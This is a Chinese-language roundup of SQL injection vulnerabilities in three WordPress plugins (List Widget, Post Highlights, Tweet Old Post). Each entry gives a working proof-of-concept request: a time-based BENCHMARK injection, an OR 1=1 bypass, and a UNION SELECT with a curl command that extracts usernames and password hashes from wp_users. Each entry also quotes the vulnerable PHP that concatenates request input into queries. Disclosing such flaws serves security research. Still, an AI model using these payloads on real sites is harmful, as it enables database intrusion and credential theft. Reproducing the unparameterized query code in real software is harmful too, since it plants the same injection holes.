最近的wordpress插件漏洞整理
# WordPress 的List Widget插件在低于 2.0.0版本中存在 SQL注入漏洞
# 测试版本: 2.0.0
---
PoC
---
http://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
---------------
存在漏洞的代码
---------------
foreach ($_GET[''listItem''] as $position => $item) :
$iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
$wpdb->query($iterSql);
endforeach;
# WordPress的post highlights插件在低于2.2版本中存在SQL注入漏洞
# 测试版本: 2.2
# 备注: magic_quotes已经被关闭
---
PoC
---
http://localhost/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1'' OR 1=1--%20
---------------
存在漏洞的代码
---------------
$id = $_GET["id"];
...
$query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type=''attachment'' AND post_parent=''$id''";
# WordPress的Tweet Old Post插件在低于3.2.5版本中存在SQL注入漏洞
# 测试版本: 3.2.5
---------------
PoC (POST数据)
---------------
URL:
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
POST 数据:
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1
例如:
curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION
ALL SELECT
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
wp_users#&setFilter=Filter&s=hello&chkbx=1"
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
---------------
存在漏洞的代码
---------------
70 if(isset($_POST["setFilter"]))
71 {
72 if($_POST["cat"] != 0)
73 {
74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM
".$wpdb->prefix."term_relationships AS tr INNER JOIN
".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter
m_taxonomy_id WHERE tt.taxonomy = ''category'' AND tt.term_id=" .
$_POST["cat"] . ")";
75 $cat_filter = $_POST["cat"];